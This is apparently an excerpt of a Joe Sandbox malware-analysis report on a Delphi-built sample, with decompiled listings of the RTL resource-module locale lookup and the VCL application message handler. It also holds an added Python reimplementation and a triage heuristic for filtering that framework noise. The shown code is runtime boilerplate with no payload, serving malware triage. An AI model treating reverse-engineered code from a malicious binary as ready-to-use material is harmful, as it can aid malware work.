                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1b2a1f391d087bf9560adc765ef8006e278fa05a23979184c48af0a4ee6843c
                                                    • Instruction ID: fdbcad1c1af0272f034c068025c722c94ca52e6f665dbf6af7dae6586587175a
                                                    • Opcode Fuzzy Hash: a1b2a1f391d087bf9560adc765ef8006e278fa05a23979184c48af0a4ee6843c
                                                    • Instruction Fuzzy Hash: D5A022328CA00ECF0AE88C83B0080383B22F280A233A002C0FC0E000208E030822CEC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (Hl$(Hl$t%Dl$t%Dl
                                                    • API String ID: 0-2740908089
                                                    • Opcode ID: 38f065437b8d67917204f43000692df8606b0ecd42e0c2363b834ed5e5aea447
                                                    • Instruction ID: 4058f24badf9e695106b78b6363f84d4f255035484392cfcaee5de4e37ea1171
                                                    • Opcode Fuzzy Hash: 38f065437b8d67917204f43000692df8606b0ecd42e0c2363b834ed5e5aea447
                                                    • Instruction Fuzzy Hash: 75B12934A402058FD7A4CF69C598FA9BBF6EF89318F1584A9E5099B371DB31EC80CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: KHl$KHl$KHl$KHl
                                                    • API String ID: 0-1846548151
                                                    • Opcode ID: 5140fcfd3633ff87f838dd754f52940ae7e19cd59a0dd4cfc2149e9e410d9eeb
                                                    • Instruction ID: df5cfd52e57a42f1f64e0ae96556da627b0ab35449ec77736e3f15cf1c0a5d4e
                                                    • Opcode Fuzzy Hash: 5140fcfd3633ff87f838dd754f52940ae7e19cd59a0dd4cfc2149e9e410d9eeb
                                                    • Instruction Fuzzy Hash: 3C2108353042100F9724EB7AA868A7EB6CAFFC55A870444BDD50ECF7A0EF25EC019391
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:4.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:972
                                                    Total number of Limit Nodes:32
49220->49223 49232 40308c 49221->49232 49223->49208 49225 40308c 4 API calls 49226 406b69 49225->49226 49227 40308c 4 API calls 49226->49227 49228 406b73 49227->49228 49239 401b60 49228->49239 49230->49208 49231->49216 49233 4030cb 49232->49233 49234 40309c 49232->49234 49235 4030c9 49233->49235 49252 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49233->49252 49234->49233 49237 4030a2 49234->49237 49235->49225 49237->49235 49251 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49237->49251 49240 401b71 49239->49240 49241 401c3d 49239->49241 49242 401b92 LocalFree 49240->49242 49243 401b88 RtlEnterCriticalSection 49240->49243 49241->49223 49244 401bc5 49242->49244 49243->49242 49245 401bb3 VirtualFree 49244->49245 49246 401bcd 49244->49246 49245->49244 49247 401bf4 LocalFree 49246->49247 49248 401c0b 49246->49248 49247->49247 49247->49248 49249 401c21 RtlLeaveCriticalSection 49248->49249 49250 401c2b RtlDeleteCriticalSection 49248->49250 49249->49250 49250->49223 49251->49235 49252->49235 49253 43eaf8 733B9840 49254 43eb29 49253->49254 49255 43eb2e 49253->49255 49257 40e79c 68 API calls 49254->49257 49257->49255 49258 41dadc 49261 409974 WriteFile 49258->49261 49262 409991 49261->49262 49263 41bd4e 49264 41bd5f 49263->49264 49267 4348a8 49264->49267 49268 4348d3 49267->49268 49269 43497d 49267->49269 49271 4348e3 SendMessageA 49268->49271 49270 4049c0 21 API calls 49269->49270 49272 41bd6c 49270->49272 49273 434901 49271->49273 49274 4348ef 49271->49274 49277 434912 SendMessageA 49273->49277 49285 404ccc 49274->49285 49276 4348ff 49279 434959 SendMessageA 49276->49279 49277->49269 49278 43491e 49277->49278 49280 43492e SendMessageA 49278->49280 49282 434967 49279->49282 49280->49269 49281 434938 49280->49281 49283 404ccc 35 API calls 49281->49283 49284 434977 SendMessageA 49282->49284 49283->49276 49284->49269 49287 404cd0 49285->49287 49294 404c88 49285->49294 49286 404a14 49292 404a84 35 API calls 49286->49292 49296 404a28 49286->49296 49287->49286 
49288 404ce0 49287->49288 49289 404cee 49287->49289 49287->49294 49295 404a14 35 API calls 49288->49295 49291 404a84 35 API calls 49289->49291 49290 404a56 49290->49276 49303 404d01 49291->49303 49292->49296 49293 404ccb 49293->49276 49294->49286 49294->49293 49297 404c96 49294->49297 49295->49294 49296->49290 49307 40277c 21 API calls 49296->49307 49299 404cc0 49297->49299 49300 404ca9 49297->49300 49301 40500c 35 API calls 49299->49301 49302 40500c 35 API calls 49300->49302 49304 404cae 49301->49304 49302->49304 49305 404a14 35 API calls 49303->49305 49304->49276 49306 404d2d 49305->49306 49306->49276 49307->49290

                                                    Control-flow Graph

                                                    C-Code - Quality: 65%
                                                    			// Delphi RTL routine (System.LoadResourceModule): looks for a locale-specific
                                                    			// resource DLL named <module>.<locale>; __eax is the module name to derive it from.
                                                    			E004061D0(intOrPtr __eax) {
                                                    				intOrPtr _v8;
                                                    				void* _v12;
                                                    				char _v15;
                                                    				char _v17;
                                                    				char _v18;
                                                    				char _v22;
                                                    				int _v28;
                                                    				char _v289;
                                                    				long _t44;
                                                    				long _t61;
                                                    				long _t63;
                                                    				CHAR* _t70;
                                                    				CHAR* _t72;
                                                    				struct HINSTANCE__* _t78;
                                                    				struct HINSTANCE__* _t84;
                                                    				char* _t94;
                                                    				void* _t95;
                                                    				intOrPtr _t99;
                                                    				struct HINSTANCE__* _t107;
                                                    				void* _t110;
                                                    				void* _t112;
                                                    				intOrPtr _t113;
                                                    
                                                    				_t110 = _t112;
                                                    				_t113 = _t112 + 0xfffffee0;
                                                    				_v8 = __eax;
                                                    				GetModuleFileNameA(0,  &_v289, 0x105); // host EXE path; used as the registry value name below
                                                    				_v22 = 0;
                                                    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed; HKEY_CURRENT_USER, 0xf0019 is the KEY_READ value Delphi's Windows unit defines
                                                    				if(_t44 == 0) {
                                                    					L3:
                                                    					_push(_t110);
                                                    					_push(0x4062d5);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t113;
                                                    					_v28 = 5;
                                                    					E00406018( &_v289, 0x105);
                                                    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) { // value named after the host EXE path, then the default ("") value; E0040643C is the empty string
                                                    						_v22 = 0;
                                                    					}
                                                    					_v18 = 0;
                                                    					_pop(_t99);
                                                    					 *[fs:eax] = _t99;
                                                    					_push(E004062DC);
                                                    					return RegCloseKey(_v12);
                                                    				} else {
                                                    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed; HKEY_LOCAL_MACHINE
                                                    					if(_t61 == 0) {
                                                    						goto L3;
                                                    					} else {
                                                    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed; HKEY_CURRENT_USER, older Delphi key name
                                                    						if(_t63 != 0) {
                                                    							_push(0x105);
                                                    							_push(_v8);
                                                    							_push( &_v289);
                                                    							L0040131C(); // lstrcpyn(&_v289, _v8, 0x105): copy the module name into the 261-byte buffer
                                                    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed; 3 == LOCALE_SABBREVLANGNAME, e.g. "ENU"
                                                    							_t107 = 0;
                                                    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                    								_t70 =  &_v289;
                                                    								_push(_t70);
                                                    								L00401324(); // lstrlen(&_v289)
                                                    								_t94 = _t70 +  &_v289;
                                                    								while( *_t94 != 0x2e && _t94 !=  &_v289) { // scan back to the last '.' (the extension)
                                                    									_t94 = _t94 - 1;
                                                    								}
                                                    								_t72 =  &_v289;
                                                    								if(_t94 != _t72) {
                                                    									_t95 = _t94 + 1;
                                                    									if(_v22 != 0) {
                                                    										_push(0x105 - _t95 - _t72);
                                                    										_push( &_v22);
                                                    										_push(_t95);
                                                    										L0040131C();
                                                    										_t107 = LoadLibraryExA( &_v289, 0, 2); // 2 == LOAD_LIBRARY_AS_DATAFILE: mapped as data only, no DllMain runs
                                                    									}
                                                    									if(_t107 == 0 && _v17 != 0) {
                                                    										_push(0x105 - _t95 -  &_v289);
                                                    										_push( &_v17);
                                                    										_push(_t95);
                                                    										L0040131C();
                                                    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                    										_t107 = _t78;
                                                    										if(_t107 == 0) {
                                                    											_v15 = 0; // truncate the language name ("ENU" -> "EN") and retry
                                                    											_push(0x105 - _t95 -  &_v289);
                                                    											_push( &_v17);
                                                    											_push(_t95);
                                                    											L0040131C();
                                                    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                    											_t107 = _t84;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							return _t107;
                                                    						} else {
                                                    							goto L3;
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    Per-statement addresses for the listing above (report viewer column): 0x004061d1 through 0x004063fd, with 0x00000000 where a statement has no code of its own.

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                    • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                    • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                    • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                    • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                    • API String ID: 1759228003-2375825460
                                                    • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                    • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                    • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                    • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
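The routine listed above under E004061D0 is Delphi RTL boilerplate (System.LoadResourceModule), not logic specific to this sample: it looks for a per-module locale override under Software\Borland\Locales, asks for the thread locale's abbreviated language name, and tries resource DLLs named <module>.<locale> with LoadLibraryExA(LOAD_LIBRARY_AS_DATAFILE). The three registry opens, the 0x000F0019 access mask (the KEY_READ value Delphi's Windows unit defines) and the LoadLibraryExA attempts in the APIs list are therefore framework noise when triaging the API trace. The Python below is an added example and is not code from the sample, from Delphi or from Joe Sandbox; it reimplements the candidate-name derivation from the listing and a small heuristic that flags this call pattern in an API trace. The registry value and the locale are passed in as plain parameters (no live registry or Win32 access is assumed), the directory in the usage path is an assumption, and SAMPLE_TRACE is a constructed trace modelled on the APIs list.

```python
"""Delphi RTL resource-module lookup, reconstructed from E004061D0.

Added example for this report section; not code from the sample, from Delphi
or from Joe Sandbox.  The logic follows the decompiled listing, which matches
Delphi's System.LoadResourceModule: the host module path is rewritten with a
locale name as its extension and each candidate is handed to
LoadLibraryExA(..., LOAD_LIBRARY_AS_DATAFILE).  Registry contents and the
thread locale are passed in as parameters (assumption: no live registry or
Win32 access), so this runs on any platform.
"""
from __future__ import annotations

from typing import Sequence

# Constants appearing in the listing (Win32 SDK values).
LOCALE_SABBREVLANGNAME = 3     # GetLocaleInfoA(locale, 3, ...) -> e.g. "ENU"
LOAD_LIBRARY_AS_DATAFILE = 2   # LoadLibraryExA(path, 0, 2): no DllMain is run
FILENAME_BUF = 0x105           # 261-byte FileName buffer (_v289 in the listing)
LOCALE_BUF = 5                 # 5-byte LocaleName / LCName buffers (_v22, _v17)

# Keys probed by the three RegOpenKeyExA calls, in the order the RTL tries them.
OVERRIDE_KEYS = (
    (0x80000001, r"Software\Borland\Locales"),         # HKEY_CURRENT_USER
    (0x80000002, r"Software\Borland\Locales"),         # HKEY_LOCAL_MACHINE
    (0x80000001, r"Software\Borland\Delphi\Locales"),  # HKEY_CURRENT_USER (old key)
)
OVERRIDE_KEY_NAMES = {name for _, name in OVERRIDE_KEYS}


def resource_module_candidates(module_path: str, locale_override: str,
                               abbrev_lang: str) -> list[str]:
    """Paths the RTL passes to LoadLibraryExA, in order, until one loads.

    module_path     - string copied into FileName by lstrcpyn (the host EXE path)
    locale_override - value found under one of OVERRIDE_KEYS, "" if none
    abbrev_lang     - LOCALE_SABBREVLANGNAME of the thread locale, "" if none
    """
    name = module_path[:FILENAME_BUF - 1]          # lstrcpyn(FileName, ..., 0x105)
    if len(locale_override) > LOCALE_BUF - 1:      # does not fit the 5-byte buffer:
        locale_override = ""                       # RegQueryValueExA fails, value ignored
    abbrev_lang = abbrev_lang[:LOCALE_BUF - 1]     # abbreviated names are 3 chars anyway
    if not name or not (abbrev_lang or locale_override):
        return []
    # Walk back from the end to the last '.' (0x2e); give up at the buffer start.
    dot = name.rfind(".")
    if dot <= 0:
        return []
    stem = name[: dot + 1]                         # P := position after the '.'
    room = (FILENAME_BUF - 1) - len(stem)          # lstrcpyn(P, x, 0x105 - (P - FileName))
    candidates: list[str] = []
    if locale_override:                            # registry override is tried first
        candidates.append(stem + locale_override[:room])
    if abbrev_lang:                                # then the thread locale, e.g. "ENU"
        candidates.append(stem + abbrev_lang[:room])
        candidates.append(stem + abbrev_lang[:2][:room])   # LCName[2] := #0 -> "EN"
    return candidates


def is_delphi_locale_probe(calls: Sequence[tuple[str, tuple]]) -> bool:
    """Triage heuristic: does an API sequence match this RTL routine?

    `calls` is a list of (api_name, args) tuples in execution order, shaped
    like the report's APIs list.  All three markers must be present: a
    RegOpenKeyExA on a Borland Locales key, a GetLocaleInfoA asking for the
    abbreviated language name, and a LoadLibraryExA with LOAD_LIBRARY_AS_DATAFILE.
    """
    opened_override_key = any(
        api == "RegOpenKeyExA" and len(args) > 1 and args[1] in OVERRIDE_KEY_NAMES
        for api, args in calls)
    asked_abbrev_lang = any(
        api == "GetLocaleInfoA" and len(args) > 1 and args[1] == LOCALE_SABBREVLANGNAME
        for api, args in calls)
    datafile_load = any(
        api == "LoadLibraryExA" and len(args) > 2 and args[2] == LOAD_LIBRARY_AS_DATAFILE
        for api, args in calls)
    return opened_override_key and asked_abbrev_lang and datafile_load


# Constructed trace modelled on the APIs list of this function (arguments cut
# down to the ones the heuristic inspects; "?" stands for a pointer).
SAMPLE_TRACE = [
    ("GetModuleFileNameA", (0, "?", 0x105)),
    ("RegOpenKeyExA", (0x80000001, r"Software\Borland\Locales", 0, 0x000F0019)),
    ("RegOpenKeyExA", (0x80000002, r"Software\Borland\Locales", 0, 0x000F0019)),
    ("RegOpenKeyExA", (0x80000001, r"Software\Borland\Delphi\Locales", 0, 0x000F0019)),
    ("lstrcpyn", ("?", "?", 0x105)),
    ("GetThreadLocale", ()),
    ("GetLocaleInfoA", (0, LOCALE_SABBREVLANGNAME, "?", 5)),
    ("LoadLibraryExA", ("?", 0, LOAD_LIBRARY_AS_DATAFILE)),
]


if __name__ == "__main__":
    # The directory is an assumption; the file name is the sample analysed here.
    host = r"C:\Users\user\Desktop\y8kdmHi6x3.exe"
    for path in resource_module_candidates(host, "", "ENU"):
        print(f"LoadLibraryExA({path!r}, 0, LOAD_LIBRARY_AS_DATAFILE)")
    print("Delphi RTL locale probe:", is_delphi_locale_probe(SAMPLE_TRACE))
```

For an English-locale sandbox with no override value the candidates are `<exe dir>\y8kdmHi6x3.ENU` and then `<exe dir>\y8kdmHi6x3.EN`; neither exists next to the dropped sample, so both LoadLibraryExA calls fail and the function returns 0. Seeing exactly that pair of failed data-file loads right after the Borland registry probes is the signature to suppress, while a LoadLibraryExA that actually succeeds on a file with such a name would deserve a look.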

                                                    Control-flow Graph

                                                    Legend: Executed / Not Executed. Node and edge list for basic blocks 459934 through 45a009 (rendered by the report's graph viewer; not reproduced as text)
                                                    C-Code - Quality: 94%
                                                    			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                                    				struct HWND__* _v8;
                                                    				struct HWND__* _v12;
                                                    				void* __ebx;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed int _t161;
                                                    				struct HWND__* _t162;
                                                    				struct HWND__* _t163;
                                                    				void* _t166;
                                                    				struct HWND__* _t176;
                                                    				struct HWND__* _t185;
                                                    				struct HWND__* _t188;
                                                    				struct HWND__* _t189;
                                                    				struct HWND__* _t191;
                                                    				struct HWND__* _t197;
                                                    				struct HWND__* _t199;
                                                    				struct HWND__* _t202;
                                                    				struct HWND__* _t205;
                                                    				struct HWND__* _t206;
                                                    				struct HWND__* _t216;
                                                    				struct HWND__* _t217;
                                                    				struct HWND__* _t222;
                                                    				struct HWND__* _t224;
                                                    				struct HWND__* _t227;
                                                    				struct HWND__* _t231;
                                                    				struct HWND__* _t239;
                                                    				struct HWND__* _t247;
                                                    				struct HWND__* _t250;
                                                    				struct HWND__* _t254;
                                                    				struct HWND__* _t256;
                                                    				struct HWND__* _t257;
                                                    				struct HWND__* _t269;
                                                    				intOrPtr _t272;
                                                    				struct HWND__* _t275;
                                                    				intOrPtr* _t276;
                                                    				struct HWND__* _t284;
                                                    				struct HWND__* _t286;
                                                    				struct HWND__* _t297;
                                                    				void* _t306;
                                                    				signed int _t308;
                                                    				struct HWND__* _t314;
                                                    				struct HWND__* _t315;
                                                    				struct HWND__* _t316;
                                                    				void* _t317;
                                                    				intOrPtr _t340;
                                                    				struct HWND__* _t344;
                                                    				intOrPtr _t366;
                                                    				void* _t370;
                                                    				struct HWND__* _t375;
                                                    				void* _t376;
                                                    				void* _t377;
                                                    				intOrPtr _t378;
                                                    
                                                     				// Delphi VCL TApplication.WndProc (Forms unit) as compiled into the sample: runtime boilerplate, not sample-specific logic.
                                                     				// _v8 = Self (TApplication), _v12 = var Message: TMessage (+0 Msg, +4 WParam, +8 LParam, +0xc Result); identifiers in the comments below are the VCL source names for the matching code.
                                                     				_t317 = __ecx;
                                                    				_push(_t370);
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_push(_t377);
                                                    				_push(0x459fee);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t378;
                                                     				 *(_v12 + 0xc) = 0; // Message.Result := 0
                                                     				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1; // FWindowHooks.Count - 1: the loop at L2 gives every registered window hook first refusal of the message
                                                    				if(_t306 < 0) {
                                                    					L5:
                                                    					E004597E8(_v8, _t317, _v12);
                                                     					_t308 =  *_v12; // Message.Msg; the nested subtract-and-compare chains that follow are a Delphi case statement on the message number
                                                    					_t161 = _t308;
                                                    					__eflags = _t161 - 0x53;
                                                    					if(__eflags > 0) {
                                                    						__eflags = _t161 - 0xb017;
                                                    						if(__eflags > 0) {
                                                    							__eflags = _t161 - 0xb020;
                                                    							if(__eflags > 0) {
                                                     								_t162 = _t161 - 0xb031; // 0xb031 = CM_DIALOGHANDLE (CM_BASE + 49)
                                                     								__eflags = _t162;
                                                     								if(_t162 == 0) {
                                                     									_t163 = _v12;
                                                     									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                                     									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                                     										 *(_v8 + 0xb0) =  *(_v12 + 8); // FDialogHandle := LParam
                                                     									} else {
                                                     										 *(_v12 + 0xc) =  *(_v8 + 0xb0); // WParam = 1: Result := FDialogHandle
                                                    									}
                                                    									L102:
                                                    									_t166 = 0;
                                                    									_pop(_t340);
                                                    									 *[fs:eax] = _t340;
                                                    									goto L103;
                                                    								}
                                                     								__eflags = _t162 + 0xfffffff2 - 2; // Msg - 0xb03f, then an unsigned compare against 2
                                                     								if(_t162 + 0xfffffff2 - 2 < 0) { // 0xb03f..0xb040 = CM_ACTIONUPDATE / CM_ACTIONEXECUTE
                                                     									 *(_v12 + 0xc) = E0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f; // Result := Ord(DispatchAction(Msg, TBasicAction(LParam)))
                                                    								} else {
                                                    									L101:
                                                     									E004598AC(_t377); // executed; Default: the nested procedure every unhandled path ends in (_t377 / __ebp is the enclosing frame, the way Delphi passes context to nested routines)
                                                    								}
                                                    								goto L102;
                                                    							}
                                                     							if(__eflags == 0) { // 0xb020 = CM_WINDOWHOOK (CM_BASE + 32): LParam points at a TWindowHook method pointer (code, data); WParam <> 0 unhooks it, otherwise it is hooked
                                                    								_t176 = _v12;
                                                    								__eflags =  *(_t176 + 4);
                                                    								if( *(_t176 + 4) != 0) {
                                                    									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                    								} else {
                                                    									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                    								}
                                                    								goto L102;
                                                    							}
                                                     							_t185 = _t161 - 0xb01a; // 0xb01a = CM_ENTER (CM_BASE + 26): if the application window (+0x30) holds focus and is not iconic, move focus to the topmost window
                                                    							__eflags = _t185;
                                                    							if(_t185 == 0) {
                                                    								_t188 = IsIconic( *(_v8 + 0x30));
                                                    								__eflags = _t188;
                                                    								if(_t188 == 0) {
                                                    									_t189 = GetFocus();
                                                    									_t344 = _v8;
                                                    									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
                                                    									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
                                                    										_t191 = E00451750(0);
                                                    										__eflags = _t191;
                                                    										if(_t191 != 0) {
                                                    											SetFocus(_t191);
                                                    										}
                                                    									}
                                                    								}
                                                    								goto L102;
                                                    							}
                                                     							__eflags = _t185 == 5;
                                                     							if(_t185 == 5) { // 0xb01a + 5 = 0xb01f = CM_INVOKEHELP, handled together with WM_HELP at L89
                                                    								L89:
                                                    								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                                    								goto L102;
                                                    							} else {
                                                    								goto L101;
                                                    							}
                                                    						}
                                                     						if(__eflags == 0) { // 0xb017 = CM_APPSYSCOMMAND (CM_BASE + 23): replay a system command on the main form (+0x44) if it exists, is enabled and is visible
                                                    							_t197 =  *(_v8 + 0x44);
                                                    							__eflags = _t197;
                                                    							if(_t197 != 0) {
                                                    								_t372 = _t197;
                                                    								_t199 = E00441704(_t197);
                                                    								__eflags = _t199;
                                                    								if(_t199 != 0) {
                                                    									_t202 = IsWindowEnabled(E00441704(_t372));
                                                    									__eflags = _t202;
                                                    									if(_t202 != 0) {
                                                    										_t205 = IsWindowVisible(E00441704(_t372));
                                                    										__eflags = _t205;
                                                    										if(_t205 != 0) {
                                                     											 *0x49be6c = 0; // FocusMessages := False while focus is moved around
                                                     											_t206 = GetFocus(); // remember the currently focused window
                                                     											SetFocus(E00441704(_t372)); // focus the main form's handle
                                                     											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8)); // MainForm.Perform(WM_SYSCOMMAND, WParam, LParam)
                                                     											SetFocus(_t206); // restore the previous focus
                                                     											 *0x49be6c = 1; // FocusMessages := True
                                                     											 *(_v12 + 0xc) = 1; // Result := 1
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							goto L102;
                                                    						}
                                                     						__eflags = _t161 - 0xb000; // 0xb000 = CM_BASE = CM_ACTIVATE
                                                     						if(__eflags > 0) {
                                                     							_t216 = _t161 - 0xb001; // 0xb001 = CM_DEACTIVATE
                                                     							__eflags = _t216;
                                                     							if(_t216 == 0) {
                                                     								_t217 = _v8;
                                                     								__eflags =  *((short*)(_t217 + 0x10a)); // Assigned(FOnDeactivate): Delphi tests the high word of the method pointer's code address
                                                     								if( *((short*)(_t217 + 0x10a)) != 0) {
                                                     									 *((intOrPtr*)(_v8 + 0x108))(); // FOnDeactivate(Self)
                                                    								}
                                                    								goto L102;
                                                    							}
                                                     							__eflags = _t216 == 0x15;
                                                     							if(_t216 == 0x15) { // 0xb001 + 0x15 = 0xb016 = CM_APPKEYDOWN: IsShortCut(Message); a match sets Result := 1
                                                    								_t222 = E0045A47C(_v8, _t317, _v12);
                                                    								__eflags = _t222;
                                                    								if(_t222 != 0) {
                                                    									 *(_v12 + 0xc) = 1;
                                                    								}
                                                    								goto L102;
                                                    							} else {
                                                    								goto L101;
                                                    							}
                                                    						}
                                                     						if(__eflags == 0) { // CM_ACTIVATE
                                                     							_t224 = _v8;
                                                     							__eflags =  *((short*)(_t224 + 0x112)); // Assigned(FOnActivate): same high-word test on the method pointer at +0x110
                                                     							if( *((short*)(_t224 + 0x112)) != 0) {
                                                     								 *((intOrPtr*)(_v8 + 0x110))(); // FOnActivate(Self)
                                                    							}
                                                    							goto L102;
                                                    						}
                                                     						_t227 = _t161 - 0x112; // 0x112 = WM_SYSCOMMAND
                                                     						__eflags = _t227;
                                                     						if(_t227 == 0) {
                                                     							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020; // WParam and $FFF0; 0xf020 = SC_MINIMIZE
                                                     							__eflags = _t231;
                                                     							if(_t231 == 0) {
                                                     								E0045A054(_v8); // SC_MINIMIZE handler
                                                     							} else {
                                                     								__eflags = _t231 == 0x100;
